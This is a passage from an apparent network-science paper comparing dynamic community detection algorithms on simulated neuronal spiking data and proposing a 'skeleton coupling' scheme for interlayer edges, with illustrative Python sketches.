Monotonic events correspond to scenarios in which the graph evolves progressively over time such that communities in one layer are nested within the communities in an adjacent layer. Such events include community expansion, shrinkage, or continuation. Non-monotonic events represent scenarios in which communities in adjacent layers can partially overlap (as in Fig.1A), but these communities do not necessarily contain each other. Examples of non-monotonic events include community merging, splitting, death, and birth. In each of these scenarios, it is necessary to properly determine how the community labels should evolve over time, as depending on the properties of the data (such as neuronal firing pattern or rate), one might want to either define a new community or carry over a previous label (see Fig. 1(B-C)). Here, we focus on examples of a monotonic event (an expanding community) and a non-monotonic event (multiple transient communities). Community structure is modeled using simulated neuronal spiking activity with built-in correlations between firing patterns of individual neurons within a given community. In addition, the community structure (correlated firing of neurons) is allowed to dynamically evolve through a series of community events.

Figure 1: **From time-series to dynamic community analysis.** **A.** A synthetic time-series from \(N=78\) neurons generated via a homogeneous Poisson process, which contains planted communities undergoing community events at every \(\tau=1000\)ms. The data is divided into 1000ms windows and six functional network snapshots representing the co-activity of neurons are constructed by calculating the maximum cross-correlation between pairs of spike trains. **B.** A two-snapshot dynamic network in which temporal carryovers are performed via either _interlayer edges_ by MMM and Infomap (left) or by some _fixed rule_ by DSBM, DPPM and Tensor Factorization (right). **C.** Three different scenarios for the community events taking place in part B. On the left, two planted communities in \(t\) 'merge' so that the resulting community in \(t+1\) has a new community label. In the middle, planted community I 'grows' by joining with planted community II, and the resulting community has the same label as I. On the right, planted community II 'grows' by joining with planted community I, and the resulting community gets the label II. Different DCD algorithms handle these types of carryovers differently.

Importantly, in this data, multiple neurons have independent firing patterns, such that many singleton communities are present in the data. In order to map this data to a temporal network, the time series is first divided into multiple windows, each representing a layer of the network. Functional network structure in each layer is obtained by computing the absolute value of the pairwise maximum cross-correlation between firing patterns of neurons over the window. Because the use of cross-correlations to define functional network connections results in a fully connected network with many small edge weight values that likely represent noise in the data, for each data set we create a set of temporal networks in which a threshold is used to eliminate connections with edge weights below the threshold value. In the following section, all results are presented across a range of threshold values (shown along the x-axis in the parameter space maps of Figs. 2, 5, and 6). Please see Methods for further details of synthetic data generation and network creation.
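As a rough illustration of this pipeline (a minimal sketch rather than the authors' code; the window length, lag range, and threshold below are placeholder values, and circular shifts stand in for a lagged cross-correlation), thresholded functional snapshots can be built from binned spike trains as follows:

```python
import numpy as np

def functional_snapshots(spikes, win=1000, max_lag=5, threshold=0.2):
    """spikes: (n_neurons, n_bins) binary array of binned spike trains.
    Returns one thresholded functional adjacency matrix per
    non-overlapping window of `win` bins."""
    n, t_total = spikes.shape
    layers = []
    for start in range(0, t_total - win + 1, win):
        window = spikes[:, start:start + win].astype(float)
        A = np.zeros((n, n))
        for i in range(n):
            for j in range(i + 1, n):
                # maximum absolute correlation over small lags
                cc = [np.corrcoef(np.roll(window[i], lag), window[j])[0, 1]
                      for lag in range(-max_lag, max_lag + 1)]
                w = np.nanmax(np.abs(cc))
                if w >= threshold:
                    A[i, j] = A[j, i] = w
        layers.append(A)
    return layers

# toy usage: 20 Poisson neurons, 6 windows of 1000 bins (1 ms per bin)
rng = np.random.default_rng(0)
spikes = (rng.random((20, 6000)) < 0.02).astype(int)
snapshots = functional_snapshots(spikes)
```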
## III Comparison of Dcd algorithm performance We compare the performance of 5 different DCD algorithms (MMM [17], Infomap [35], DSBM [20], DPPM [22] and Tensor Factorization [23]) on two different community evolution scenarios as described above (expanding and transient communities). We include a range of algorithm specific hyperparameters (resolution parameter \(\gamma\), multilayer relax rate \(\rho\), degree correction \(\Delta\), k-plex dimension \(k\), and input tensor rank \(\eta\), respectively) as the y-axes of parameter space maps for these 5 algorithms. In the left panels of Fig.2A and Fig.2B, we display the ground truth of the community evolution of planted dynamic communities. We then plot the parameter space describing the performance of the algorithm as a function of the normalized mutual information (NMI) [36; 37] with respect to the ground truth (See Methods Section 'Evaluating partition quality'). In these plots, the parameter values representing the optimal performance of each algorithm are indicated by the region bounded by the green rectangle (See Methods Section 'Optimal regions'). An example of the community evolution in this optimal regime is shown below the parameter space plot. In Fig. 2(A), we present the performance of the 5 DCD algorithms to detect the community evolution of an expanding community event. Neurons first exist as singleton communities (firing patterns are uncorrelated with others) and join a growing correlated community as time advances (series of monotonic events). As seen in the NMI parameter landscapes, each algorithm varies in its ability to correctly detect this pattern of community evolution. Example community evolution plots and respective parameters are shown for the optimal algorithm performance below these plots. It can be observed that the MMM and Infomap algorithms perform the best at detecting singleton communities and performing temporal carryover; these algorithms also produce the highest NMI values (darker shade of red) over a wider range of parameters. Still, MMM fails to properly detect the expanding community, whereas Infomap partially detects this growing community, albeit with some noise. DSBM and DPPM, on the other hand, yield relatively low NMI and result in the detection of 2 total communities, as they do not properly distinguish the singleton communities and instead lump all uncorrelated neurons into a single community. Tensor Factorization performs somewhere in-between these extremes and detects most of the communities in individual layers separately, failing to properly perform temporal carryover. We next compare the performance of the algorithms on data containing transient and singleton communities (non-monotonic events; Fig. 2B). Again, we observe that MMM and Infomap perform the best as measured by the NMI, but the optimal community partitions shows that they are detecting rather different patterns of community evolution. Both algorithms are able to detect singleton communities and perform temporal carryover on the singleton communities. MMM additionally, detects some of the transient larger communities, but fails to perform temporal carryover between layers for these transient communities. Tensor Factorization can also detect the transient communities in addition to singleton communities but completely fails at performing temporal carryover of community layers. Once again, DSBM and DPPM only detect two communities which does not reflect the planted structure and is apparent in their low NMI values. 
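Regarding the evaluation itself, one simple way to score a predicted dynamic partition against the planted one is to treat every (node, layer) pair as an item and compute NMI over the flattened label vectors; a minimal sketch (assuming scikit-learn, and not necessarily the exact convention used to produce the figures) is:

```python
import numpy as np
from sklearn.metrics import normalized_mutual_info_score

def dynamic_nmi(true_labels, pred_labels):
    """true_labels, pred_labels: arrays of shape (n_layers, n_nodes) holding
    a community label for every node in every snapshot."""
    return normalized_mutual_info_score(np.asarray(true_labels).ravel(),
                                        np.asarray(pred_labels).ravel())

# toy example: 2 layers, 4 nodes; same partition, different label names
truth = [[0, 0, 1, 2], [0, 0, 1, 1]]
pred  = [[5, 5, 7, 9], [5, 5, 7, 7]]
print(dynamic_nmi(truth, pred))   # 1.0 -- NMI is invariant to relabeling
```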
It is notable that in each of the scenarios studied, the DSBM and DPPM algorithms were unable to detect the presence of singleton communities in the data. Further, Tensor Factorization consistently failed to perform temporal carryover of detected communities. While MMM and Infomap did not always perform the temporal carryover correctly, they were able to identify singleton communities, and importantly, these algorithms rely on interlayer edges to link layers across time. In the data presented above, for the MMM and Infomap algorithms, the standard technique of diagonal coupling was used, as this is the most commonly employed method of coupling. However, this is another parameter that can be tweaked when using these algorithms, and for the remainder of this paper, we will focus on the use of different methods of interlayer coupling to further improve community detection in the MMM and Infomap algorithms. ## IV Traditional interlayer coupling When employing the MMM and Infomap algorithms in a temporal network, the network must be constructed by using interlayer edges that describe how nodes are linked across layers (and therefore across time). Here we review some standard and recently proposed methods for defining interlayer links in temporal networks. Let \(\mathsf{T}=(V,E)\) be a node-aligned temporal network with snapshot representation \(\mathsf{T}=\{\mathsf{G}_{1},\mathsf{G}_{2},...\mathsf{G}_{t_{max}}\}\). We'll denote the node \(\sigma_{\alpha}\) in the layer \(\mathsf{G}_{t}\) by \(\sigma_{\alpha}^{t}\) and an undirected edge from \(\sigma_{\alpha}^{t}\) to another node \(\sigma_{\beta}^{s}\) by \((\sigma_{\alpha}^{t},\sigma_{\beta}^{s})\). ### Diagonal coupling The most common way of constructing interlayer edges is to use diagonal coupling. In this case, each node of the network is coupled with its temporal counterpart in a regular fashion as in Fig.3A. Thus, there exists an interlayer edge \((\sigma_{\alpha}^{t},\sigma_{\alpha}^{t+1})\) for all \(\alpha\) and for all \(t\in\{1,2,..,t_{max}-1\}\) with edge weight \(\omega\), where \(\omega\) is constant across all edges, but its value must be specified by the user. Here, \(\omega\) can be thought of as a self-identity link that preserves the identity of the node throughout time. We will refer to this method of coupling as _uniform diagonal coupling_. While this method of coupling will allow for a node to maintain its identity throughout the network, it does not capture the fact that in many networks, the nodes represent dynamic entities whose properties change throughout time. A question one may ask is if changing the values of the interlayer edge weights (i.e., allowing for \(\omega\) to vary across nodes and layers) would make a difference in the detection of dynamic communities. Each diagonal interlayer edge is a link from a node to its future or past self, so in this sense, these links indicate the strength of temporal self-similarity of nodes. In our simulated data, the nodes are in fact neurons whose firing rates and patterns can evolve, thus a nodes self-similarity over time is not necessarily constant. Previous work [38] has described a method that allows for the value of \(\omega\) to change based on the level of nodal self-similarity. The greater the change in the self-similarity of a node is between snapshots (e.g. 
the firing rate of the neuron), the weaker the node's interlayer edge weight is between the corresponding temporal layers. We refer to this method as _diagonal coupling with local updates_ and, mathematically, we assign an interlayer edge between \(\sigma_{\alpha}^{t}\) and \(\sigma_{\alpha}^{t+1}\) for all \(\alpha\) and for all \(t\in\{1,2,..,t_{max}-1\}\) with edge weight \(\omega_{\alpha}^{t}\) depending on the spike rate change in node \(\sigma_{\alpha}\) from \(\mathsf{G}_{t}\) to \(\mathsf{G}_{t+1}\). See the Methods Section 'Interlayer coupling' for details.

Figure 2: **Comparing DCD algorithms on simulated time series.** A comparison of algorithm performance across parameter spaces and _example partitions_ for the optimal regions of five different DCD algorithms: MMM, Infomap, DSBM, DPPM and Tensor Factorization. Algorithm performance is explored as a function of the edge threshold, \(T\), and an algorithm-specific parameter (resolution parameter \(\gamma\), multilayer relax rate \(\rho\), degree correction \(\Delta\), k-plex size \(k\) and tensor rank \(\eta\), respectively) by plotting the normalized mutual information (NMI) between the 'ground truth' community labels (left panel) and predicted labels. The optimal region is defined as the parameter values \((T,\cdot)\) in which NMI is maximized, and an _example partition_ from this region is shown under each parameter grid. Partition plots represent the community evolution across six snapshots (network layers) and the colors indicate the community label of each neuron at each point in time. **A.** Dynamics of \(N=78\) spiking neurons are simulated such that a large community keeps expanding by merging with singleton communities at every layer (monotonic event). There are 67 community labels in total during the ground truth community evolution. **B.** Dynamics of \(N=78\) spiking neurons are simulated such that synchronized groups of neurons appear and disappear over time, i.e., _transient communities_, and neurons that are not part of any community are assigned a unique community label (indicated by colors) that is temporally carried over unless a neuron undergoes a community event. A total of 122 community labels are produced during this event as shown in the ground truth partition plot.

### Non-diagonal coupling

While diagonal coupling only allows for a link between a node and itself across layers of the network, it is also completely reasonable to relax this restriction and allow links between some or all pairs of nodes, which introduces a new dimension of complexity and increases the size of the parameter space enormously. While there are multiple ways that one could perform a non-diagonal coupling scheme, here we highlight one previously proposed method called _neighborhood coupling_ [39], which connects a maximal neighborhood around every node with the adjacent layers (Fig.3B). Mathematically, we assign interlayer edges of constant weight \(\omega\) from \(\sigma_{\alpha}^{t}\) to a set \(\{\sigma_{\beta}^{t+1}\}_{\beta\in\mathsf{N}_{\alpha}^{t}}\) such that \(\sigma_{\beta}\) is in the maximal neighborhood of \(\sigma_{\alpha}^{t}\) in terms of edge weight (strongly connected neighbors of \(\sigma_{\alpha}\) in \(\mathsf{G}_{t}\)), where \(\mathsf{N}_{\alpha}^{t}=\{\sigma_{\beta}^{t}|(\sigma_{\beta}^{t},\sigma_{\alpha}^{t})\in E_{t}\}\). See the Methods Section 'Interlayer coupling' for details.
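To make these two heuristics concrete before turning to skeleton coupling below, the sketch that follows (our own illustration; the specific damping function for the local update is an assumption rather than the formula of [38], and the neighborhood rule simply uses all above-threshold neighbors as a stand-in for the maximal neighborhood) builds the interlayer block between two consecutive snapshots:

```python
import numpy as np

def diagonal_coupling(n_nodes, omega=1.0, rates_t=None, rates_t1=None):
    """Interlayer block between snapshots t and t+1 (rows: layer t,
    columns: layer t+1).  Uniform diagonal coupling by default; if firing
    rates are supplied, each self-link is damped by the relative rate
    change (one possible 'local update' rule, chosen for illustration)."""
    C = omega * np.eye(n_nodes)
    if rates_t is not None and rates_t1 is not None:
        change = np.abs(np.asarray(rates_t1, float) - np.asarray(rates_t, float))
        change = change / (np.abs(np.asarray(rates_t, float)) + 1e-12)
        C *= 1.0 / (1.0 + change)   # larger rate change -> weaker self-link
    return C

def neighborhood_coupling(A_t, omega=1.0):
    """Couple every node to itself and to its above-threshold neighbors
    in snapshot t (a simplified version of neighborhood coupling)."""
    C = (np.asarray(A_t) > 0).astype(float)
    np.fill_diagonal(C, 1.0)        # keep the self-identity link
    return omega * C

# usage with a tiny thresholded functional adjacency matrix for snapshot t
A_t = np.array([[0.0, 0.6, 0.0], [0.6, 0.0, 0.4], [0.0, 0.4, 0.0]])
print(diagonal_coupling(3, rates_t=[10, 12, 3], rates_t1=[10, 6, 3]))
print(neighborhood_coupling(A_t))
```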
Neighborhood coupling is based on the assumption that the topology of the network in its previous state affects how the network evolves. Note that this method also results in a more dense coupling than that of diagonal coupling, as seen in Fig. 3B.

Figure 3: **Types of interlayer coupling heuristics.** **A.** Diagonal coupling. Nodes are only allowed to be connected to their past and future self with a uniform edge weight (uniform coupling). A modification to this (local updates) can be done by dynamically altering the edge weights based on a self-similarity metric of the node from time \(t\) to \(t+1\). **B.** Non-diagonal coupling. Interlayer coupling can exist between any pair of nodes. In the example, we illustrate neighborhood coupling, which connects neighborhoods of every node with the adjacent layer.

## V Skeleton coupling

While neighborhood coupling has the advantage of incorporating the topology of the current state of the network into the coupling between layers, this approach does not directly address our desire to improve community carryover between layers, as the neighborhood of a node is distinct from its community assignment within that layer. We therefore propose a novel method of non-diagonal coupling that we call _skeleton coupling_, which is designed to link network layers based on the static community structure within layers, therefore promoting the correct temporal carryover of community labels. The main idea of skeleton coupling is to assign interlayer links to a node either sparsely or densely depending on its temporal neighborhood history, creating temporal channels between snapshots. Moreover, by definition of a dynamic community, interlayer coupling links should only exist between the temporally carried over communities because these links are directional maps (due to the asymmetric nature of time), mapping a previous state of the system into a future state. We therefore start by finding the static communities in every snapshot (network layer) in order to determine the domain and range of these maps. This step could be performed using any static community detection method, although here we use the static version of the same DCD algorithm applied later (Fig.4B). Once all of the static community partitions have been determined for a temporal network \(\mathsf{T}\), for a snapshot \(\mathsf{G}_{t}\) we can write \(\mathsf{P}_{t}=\{C_{1},C_{2},...,C_{p}\}\) for all \(t\), where \(C_{i}\) consists of the nodes, \(\sigma_{\alpha}^{t}\), of the network belonging to the community \(C_{i}\). We can then define the \(k\)-skeleton of each community in \(\mathsf{P}_{t}\) in the static layer \(\mathsf{G}_{t}\) as a simplicial complex \(\{\mathsf{SC}^{k}\}_{C_{i}}^{t}\). For now, we will focus on the case \(k\leq 1\) for computational simplicity. Each 1-skeleton describes the nodes of the community and the unweighted edges (1-simplices) fully connecting them, i.e., \(\{\mathsf{SC}^{1}\}_{C_{i}}^{t}=\{(\sigma_{\alpha}^{t},\sigma_{\beta}^{t})|\sigma_{\alpha}^{t},\sigma_{\beta}^{t}\in C_{i}\}\). Thus, a skeleton of a community \(C_{i}\) of size \(k\) is the \(k\)-clique consisting of the nodes whose community label, belonging to \(C_{i}\), will be temporally carried over (or not) to the next snapshot (Fig. 4A). One important observation here is that singleton communities can only have a 0-skeleton, \(\{\mathsf{SC}^{0}\}_{C_{i_{0}}}^{t}=\{\sigma_{\alpha}^{t}|\sigma_{\alpha}^{t}\in C_{i_{0}}\}\), since \(|C_{i_{0}}|=1\) and a \(1\)-clique is nothing but a vertex with no edges.
For any node \(\sigma_{\alpha}^{t}\) in layer \(\mathsf{G}_{t}\), there are then two possibilities: 1) \(\sigma_{\alpha}^{t}\) can belong to a community of size greater than or equal to 2 (\(|C_{\alpha}|\geq 2\) and \(\sigma_{\alpha}^{t}\) is part of a 1-skeleton \(\{\mathsf{SC}^{1}\}_{C_{\alpha}}^{t}\)), or 2) it can be a singleton community (\(|C_{\alpha}|=1\) and \(\sigma_{\alpha}^{t}\) has a 0-skeleton \(\{\mathsf{SC}^{0}\}_{C_{\alpha}}^{t}\)). Next, we look at \(\sigma_{\alpha}^{t}\)'s counterpart in the layer \(\mathsf{G}_{t+1}\) to see if \(\sigma_{\alpha}^{t+1}\) is part of a 0- or 1-skeleton. In order to determine how to design the interlayer coupling, we then consider all \(4\) possibilities of combinations between the skeletons of \(\sigma_{\alpha}^{t}\) and \(\sigma_{\alpha}^{t+1}\):

**case i:**: \(\sigma_{\alpha}^{t}\) _and \(\sigma_{\alpha}^{t+1}\) are both 0-skeletons:_ We assign an undirected interlayer edge \((\sigma_{\alpha}^{t},\sigma_{\alpha}^{t+1})\) with uniform edge weight \(\omega\) (i.e. we diagonally couple 0-skeletons). This situation, in general, describes the continuation of a community label that is maintained by the same singleton over time. This is seen in Fig. 4C, where \(\sigma_{\gamma}^{t}\) and \(\sigma_{\gamma}^{t+1}\) are both 0-skeletons (\(\{\mathsf{SC}^{0}\}_{\{\gamma\}}^{t}\) and \(\{\mathsf{SC}^{0}\}_{\{\gamma\}}^{t+1}\), respectively); there is only one self-identity link \((\sigma_{\gamma}^{t},\sigma_{\gamma}^{t+1})\) between them. Similarly, \(\sigma_{6}^{t+1}\) and \(\sigma_{6}^{t+2}\) are also linked by a single self-identity edge.

**case ii:**: \(\sigma_{\alpha}^{t}\) _is a 0-skeleton and \(\sigma_{\alpha}^{t+1}\) is part of a 1-skeleton:_ In this case, we do not assign any interlayer edges from \(\sigma_{\alpha}^{t}\) to the next snapshot \(\mathsf{G}_{t+1}\) since we don't want a singleton community label to persist when the singleton node joins a larger community. For example, in Fig. 4C, observe that \(\sigma_{\gamma}^{t+1}\) is a 0-skeleton (\(\{\mathsf{SC}^{0}\}_{\{\gamma\}}^{t+1}\)), but \(\sigma_{\gamma}^{t+2}\) is part of a 1-skeleton (\(\{\mathsf{SC}^{1}\}_{\{7,8,9\}}^{t+2}\)). We therefore did not assign any interlayer links associated with this node between the two snapshots, as indicated by the dashed arrow in the figure.

Figure 4: **Skeleton coupling.** **A.** Skeletons of given sets (denoted by color) with different numbers of nodes. If the set has size larger than 1, we utilize the associated 1-skeleton whereas if the sets have size equal to 1, they can only have 0-skeletons. **B.** Schematic of our proposed skeleton coupling framework for determining non-empirical interlayer edges in dynamic community detection. Static community detection is performed on individual layers to find the communities in each layer (indicated by colors). Interlayer edges are then assigned via skeleton coupling, and dynamic community detection is applied to the resulting temporal network. **C.** The set matching algorithm performed by skeleton coupling on a toy network. From left to right, each column represents the skeletons of the communities within the static layers \(\mathsf{G}_{t}\), \(\mathsf{G}_{t+1}\) and \(\mathsf{G}_{t+2}\) shown in B. Solid arrows indicate interlayer edge assignments, whereas dashed arrows indicate no interlayer coupling. Colors of the arrows indicate the community label to be carried over to the next snapshot. In order to determine the interlayer edges between layers \(\mathsf{G}_{t}\) and \(\mathsf{G}_{t+1}\), we compare the skeletons that vertices constitute. See the text for descriptions of interlayer edges between layers.
**case iii:**: \(\sigma_{\alpha}^{t}\) _is part of a 1-skeleton and \(\sigma_{\alpha}^{t+1}\) is a 0-skeleton:_ This case is the time-reversed version of _case ii_. We do not assign any interlayer edges from the node \(\sigma_{\alpha}^{t}\) to the time step \(\mathsf{G}_{t+1}\) since this case describes a community shrinking and splitting, and we don't want the community label of the node \(\sigma_{\alpha}^{t}\) to be carried over to the next time step. Note in Fig. 4C, for example, that \(\sigma_{6}^{t}\) is part of a 1-skeleton (\(\{\mathsf{SC}^{1}\}_{\{6,8,9\}}^{t}\)) and \(\sigma_{6}^{t+1}\) is a 0-skeleton (\(\{\mathsf{SC}^{0}\}_{\{6\}}^{t+1}\)). We therefore did not assign any interlayer links associated with this node between the two snapshots, as indicated by the dashed arrow in the figure.

**case iv:**: \(\sigma_{\alpha}^{t}\) _and \(\sigma_{\alpha}^{t+1}\) are both parts of 1-skeletons:_ We assign interlayer edges of uniform strength \(\omega\) from every node with which \(\sigma_{\alpha}^{t}\) shares a community \(C_{\alpha^{t}}\) to every other node with which \(\sigma_{\alpha}^{t+1}\) shares a community \(C_{\alpha^{t+1}}\) in the snapshot \(\mathsf{G}_{t+1}\). Depending on the sizes of the communities that \(\sigma_{\alpha}^{t}\) and \(\sigma_{\alpha}^{t+1}\) are part of, this situation can describe multiple types of community events. Regardless, we want the community label to persist over time. In Fig. 4C, notice for example that \(\sigma_{3}^{t}\) and \(\sigma_{3}^{t+1}\) belong to communities of size larger than 1: \(C_{3^{t}}=\{\sigma_{2}^{t},\sigma_{3}^{t},\sigma_{5}^{t}\}\) and \(C_{3^{t+1}}=\{\sigma_{1}^{t+1},\sigma_{2}^{t+1},\sigma_{3}^{t+1},\sigma_{4}^{t+1},\sigma_{5}^{t+1}\}\) (and the corresponding simplicial complexes \(\{\mathsf{SC}^{1}\}_{\{2,3,5\}}^{t}\) and \(\{\mathsf{SC}^{1}\}_{\{1,2,3,4,5\}}^{t+1}\), respectively). This implies we add interlayer edges from \(\sigma_{3}^{t}\) to \(C_{3^{t+1}}\). If we look at other elements of \(C_{3^{t}}\), \(\sigma_{2}^{t}\) and \(\sigma_{5}^{t}\), and their counterparts in the next layer, \(\sigma_{2}^{t+1}\) and \(\sigma_{5}^{t+1}\), we see a similar scenario, and therefore, we add links from all the nodes of the community \(C_{3^{t}}\) to all of the nodes of \(C_{3^{t+1}}\), building a temporal bridge between them.

Skeleton coupling thus serves as a finely tuned coupling strategy based on the topological difference between singletons and larger communities in the time-varying network. Here, we use the terminology of a 'k-skeleton' from topological data analysis (TDA) [24; 25; 26; 27] because we claim that the definition of a dynamic community in functional networks is in the form of \(k\)-plexes [22]. In a perfect world of noiseless data, a community of \(n\) nodes should be an \(n\)-clique, whereas in reality, a dynamic community is a set of nodes that has missing or noisy links. We therefore rely on the simplicial complex definition and usage of skeletons to account for real-world data in which true cliques are unlikely to be present within communities. We also provide a pseudo-code of the implementation of skeleton coupling in Supplementary Material 'Skeleton coupling algorithm'.
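For readers who prefer code to prose, the case analysis above can be condensed into a short sketch. The snippet below is an independent, minimal Python illustration, not the released implementation (whose pseudo-code is in the Supplementary Material and whose code is at [40]); it assumes each layer's static partition is given as a dictionary mapping nodes to community labels, and it emits the interlayer edge list implied by cases i-iv with a uniform weight \(\omega\).

```python
from itertools import product

def skeleton_coupling_edges(partitions, omega=1.0):
    """Illustrative sketch of skeleton coupling (cases i-iv).

    partitions: list of dicts, one per layer, mapping node -> community label.
    Returns a list of interlayer edges ((node, t), (node', t+1), weight).
    """
    edges = []
    for t in range(len(partitions) - 1):
        p_now, p_next = partitions[t], partitions[t + 1]
        comm_now, comm_next = {}, {}
        for node, c in p_now.items():
            comm_now.setdefault(c, set()).add(node)
        for node, c in p_next.items():
            comm_next.setdefault(c, set()).add(node)
        done_pairs = set()  # avoid duplicating the dense case-iv bundles
        for node in p_now:
            if node not in p_next:
                continue
            C_a = comm_now[p_now[node]]      # community of node at time t
            C_b = comm_next[p_next[node]]    # community of node at time t+1
            if len(C_a) == 1 and len(C_b) == 1:
                # case i: 0-skeleton -> 0-skeleton, diagonal self-link
                edges.append(((node, t), (node, t + 1), omega))
            elif len(C_a) == 1 or len(C_b) == 1:
                # cases ii & iii: singleton joining / leaving a community,
                # no interlayer edge so the label is not carried over
                continue
            else:
                # case iv: 1-skeleton -> 1-skeleton, densely couple the two
                key = (frozenset(C_a), frozenset(C_b))
                if key in done_pairs:
                    continue
                done_pairs.add(key)
                for u, v in product(C_a, C_b):
                    edges.append(((u, t), (v, t + 1), omega))
    return edges

# toy example with three layers of five nodes
layers = [
    {1: "a", 2: "a", 3: "a", 4: "b", 5: "c"},
    {1: "a", 2: "a", 3: "a", 4: "a", 5: "c"},
    {1: "a", 2: "a", 3: "a", 4: "a", 5: "a"},
]
print(len(skeleton_coupling_edges(layers)))
```

In the toy partitions at the bottom, the singleton node 5 receives a single diagonal link from layer 0 to layer 1 (case i), loses its link once it joins the large community (case ii), and the growing community is densely bridged between consecutive layers (case iv).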
## VI Applications of skeleton coupling to temporal network analysis

In Section III, we showed that the MMM and Infomap algorithms were capable of detecting singleton communities within the data, but performed poorly in carrying over the correct community labels. In these previous comparisons, we focused on the effect of the resolution parameter, \(\gamma\), (MMM) and the multilayer relax rate, \(\rho\), (Infomap) as a function of the edge threshold value, \(T\). Here, we will now fix \(\gamma\) and \(\rho\) and instead explore the effects of incorporating four different interlayer coupling strategies: uniform diagonal coupling, diagonal coupling with local updates, neighborhood coupling, and our newly proposed skeleton coupling. In each case, we explore the performance of the algorithm as a function of the interlayer edge weight, \(\omega\), and the edge threshold value, \(T\), i.e. across the \((T,\omega)\) parameter space. As before, we compare algorithm performance for two distinct types of community evolution scenarios: a monotonic series of community events in which an initial community expands over time until the whole network is synchronized, and a non-monotonic event in which _transient communities_ appear/disappear over time. We now show how incorporating the use of skeleton coupling into the design of networks results in improved performance of temporal carryover for both MMM and Infomap algorithms.

### Influence of skeleton coupling with MMM

We first compare the performance of MMM under different interlayer coupling strategies. In Fig. 5(A), we present the results of using uniform diagonal coupling and diagonal coupling with local updates for an expanding community. Below the NMI plots, we show the community evolution plots of both optimal and non-optimal parameter choices. Observe that both coupling techniques yield structurally similar results, failing to identify the expanding community and instead carrying over the independent community labels. This result is true for both optimal and non-optimal choices of coupling parameters. Next, we study non-diagonal coupling approaches using neighborhood coupling and skeleton coupling. Notice that both of these non-diagonal approaches succeed in detecting the expanding planted dynamic community. However, neighborhood coupling fails to temporally carry over the singleton communities, assigning a different community label to each node at every layer, resulting in a total of 235 communities. On the other hand, skeleton coupling correctly carries over the singleton communities and results in a total number of detected communities that is within a reasonable range of the ground truth. We also see an overall improvement in the performance of the algorithm for non-optimal parameter regions: parameter regions that are near optimal (yellow boxes) can partially recover the expanding community correctly. In Fig. 5(B), we next examine the performance of different coupling strategies in correctly detecting transient communities in the data. Notice that both diagonal coupling strategies perform relatively well in finding planted _transient communities_ within a layer. However, while some singleton community labels are correctly temporally carried between layers, the diagonal coupling strategies perform poorly in correctly carrying over the transient community labels between snapshots. When using non-diagonal coupling strategies, we observe that both neighborhood coupling and skeleton coupling perform well in correctly detecting and carrying over transient community labels.
However, neighborhood coupling performs poorly at correctly carrying over independent community labels, which results in a high number of total detected communities. Skeleton coupling results in not only correctly detecting and carrying over transient communities, but is also able to correctly carry over independent community labels, resulting in higher performance values. Overall, skeleton coupling outperforms the other coupling heuristics when combined with MMM for both community evolution scenarios.

Figure 5: **Comparison of different interlayer coupling strategies for MMM.** Comparison of different interlayer coupling heuristics for \(N=78\) neurons undergoing **A.** expanding community events with 63 total community labels and **B.** transient community events with a total of 141 community labels. Community labels are depicted by color. Parameter landscapes show algorithm performance measured by the NMI in the \((T,\omega)\) parameter space. The configuration model was chosen as the null model and the resolution parameter was equal to \(0.94\) for the expanding events in A and \(1.46\) for transient events in B. Under each parameter space, we illustrate _example partitions_ found by the MMM algorithm within the bounds of optimal and non-optimal regions highlighted by green, yellow and blue rectangles, in the order of descending NMI, respectively.

### Influence of skeleton coupling with Infomap

In Fig. 6, we show the performance of the four different coupling strategies when combined with the Infomap algorithm for the same data as in Fig. 5. Observe in Fig. 6(A) that, for the expanding community, both diagonal coupling techniques seem to fail to correctly detect the neurons contained in the first few snapshots of the temporal network as part of the expanding community, possibly due to the number of snapshots in the temporal network. However, these coupling schemes perform fairly well at capturing the temporal carryover of singleton community labels. For the case of the non-diagonal coupling schemes, both non-diagonal approaches correctly identify the expanding community. However, neighborhood coupling fails to temporally carry over the singleton communities, assigning each node a different community label in every layer. In contrast, skeleton coupling correctly detects the temporal carryover of singleton communities, resulting in a relatively good match between the detected evolution of communities and the ground truth. In Fig. 6(B), we explore the performance of the coupling strategies to detect transient communities in the data. Interestingly, when combined with the Infomap algorithm, diagonal coupling approaches perform very poorly, failing to identify the communities in each layer. Further, the use of these coupling strategies results in a tendency for the community labels of all nodes, regardless of whether they belong to a singleton or a larger community, to be carried over. On the other hand, we again find that non-diagonal coupling approaches perform better than diagonal coupling, as indicated by the NMI values (darker shade of red). Indeed, example partitions show that both neighborhood coupling and skeleton coupling correctly identify the planted _transient communities_. However, neighborhood coupling fails to temporally carry over singletons (similar to Fig. 6(A)), increasing the total number of community labels.
Similarly, skeleton coupling correctly performs temporal carryover of singleton communities and shows a high correlation between the detected community evolution and the ground truth.

Figure 6: **Comparisons of different interlayer coupling strategies for Infomap.** Comparison of different interlayer coupling heuristics for \(N=78\) neurons undergoing **A.** expanding community events with 63 total community labels and **B.** transient community events with a total of 141 community labels. Community labels are depicted by color. Parameter landscapes show algorithm performance measured by the NMI in the \((T,\omega)\) parameter space. The multilayer relax rate was set to \(0.2\) in both panels. Under each parameter space, we illustrate _example partitions_ found by the Infomap algorithm within the bounds of optimal and non-optimal regions highlighted by green, yellow and blue rectangles, in the order of descending NMI, respectively.

## VII Discussion

Real-world complex systems exhibit dynamical behavior in which the state of the system changes over time. Subsequently, temporal networks and dynamic community detection (DCD) can be used to assess the evolution of network communities. Here, we examined 5 different DCD algorithms and showed that current methods for these algorithms fail in data with many singleton communities and transient events. We also found that algorithms that employed interlayer edge coupling strategies (MMM and Infomap) performed better at identifying singleton communities. Further, the use of non-diagonal coupling strategies additionally resulted in superior temporal carryover of community assignments. We therefore developed a novel non-diagonal interlayer coupling scheme that we call _skeleton coupling_, which incorporates the temporal neighborhood history encoded in the adjacent previous network states in order to algorithmically determine the placement of interlayer edges. Skeleton coupling outperformed existing interlayer coupling schemes by correctly temporally carrying over both singleton and large community labels in synthetically generated data. Skeleton coupling builds upon the idea that singleton communities are topologically different than larger size communities. We think of dynamic communities as 1-skeletons (or cliques of partitions) independent of their connectivity in the network. In other words, given a partition of a network into communities, the 1-skeleton of a community is the fully connected subnetwork of its nodes, which does not have any other outside connections, discretizing the community from the rest of the network. Since a singleton community, i.e., a 0-skeleton, does not have any edges within it, it cannot have a 1-skeleton, whereas a larger community containing edges between its members can have at least a 1-skeleton. Therefore, a 0- and 1-skeleton are topologically different, and they have to be coupled differently. By considering the time evolution of skeletons of communities on a temporal network, skeleton coupling algorithmically links connected components of temporal networks, which corresponds to assigning interlayer edges in the discretized versions of communities in the skeleton representation. The development of novel non-diagonal coupling schemes is also motivated by the fact that when diagonal coupling schemes are used, the selection of the proper edge weight, threshold, and 